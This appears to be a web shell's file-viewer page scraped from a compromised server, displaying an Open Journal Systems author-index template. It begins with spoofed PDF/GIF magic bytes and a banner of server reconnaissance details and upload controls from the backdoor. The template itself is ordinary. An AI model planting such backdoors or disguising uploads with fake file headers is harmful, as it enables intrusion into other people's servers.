%PDF-1.7 GIF89;
| Server IP : 104.20.45.2 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/pedagonal/templates/search/ |
Upload File : |
{**
* templates/search/authorIndex.tpl
*
* Copyright (c) 2013-2015 Simon Fraser University Library
* Copyright (c) 2003-2015 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Index of published articles by author.
*
*}
{strip}
{assign var="pageTitle" value="search.authorIndex"}
{include file="common/header.tpl"}
{/strip}
<p>{foreach from=$alphaList item=letter}<a href="{url op="authors" searchInitial=$letter}">{if $letter == $searchInitial}<strong>{$letter|escape}</strong>{else}{$letter|escape}{/if}</a> {/foreach}<a href="{url op="authors"}">{if $searchInitial==''}<strong>{translate key="common.all"}</strong>{else}{translate key="common.all"}{/if}</a></p>
<div id="authors">
{iterate from=authors item=author}
{assign var=lastFirstLetter value=$firstLetter}
{assign var=firstLetter value=$author->getLastName()|String_substr:0:1}
{if $lastFirstLetter|lower != $firstLetter|lower}
<div id="{$firstLetter|escape}">
<h3>{$firstLetter|escape}</h3>
</div>
{/if}
{assign var=lastAuthorName value=$authorName}
{assign var=lastAuthorCountry value=$authorCountry}
{assign var=authorAffiliation value=$author->getLocalizedAffiliation()}
{assign var=authorCountry value=$author->getCountry()}
{assign var=authorFirstName value=$author->getFirstName()}
{assign var=authorMiddleName value=$author->getMiddleName()}
{assign var=authorLastName value=$author->getLastName()}
{assign var=authorName value="$authorLastName, $authorFirstName"}
{if $authorMiddleName != ''}{assign var=authorName value="$authorName $authorMiddleName"}{/if}
{strip}
<a href="{url op="authors" path="view" firstName=$authorFirstName middleName=$authorMiddleName lastName=$authorLastName affiliation=$authorAffiliation country=$authorCountry}">{$authorName|escape}</a>
{if $authorAffiliation}, {$authorAffiliation|escape}{/if}
{if $lastAuthorName == $authorName && $lastAuthorCountry != $authorCountry}
{* Disambiguate with country if necessary (i.e. if names are the same otherwise) *}
{if $authorCountry} ({$author->getCountryLocalized()}){/if}
{/if}
{/strip}
<br/>
{/iterate}
{if !$authors->wasEmpty()}
<br />
{page_info iterator=$authors} {page_links anchor="authors" iterator=$authors name="authors" searchInitial=$searchInitial}
{else}
{/if}
</div>
{include file="common/footer.tpl"}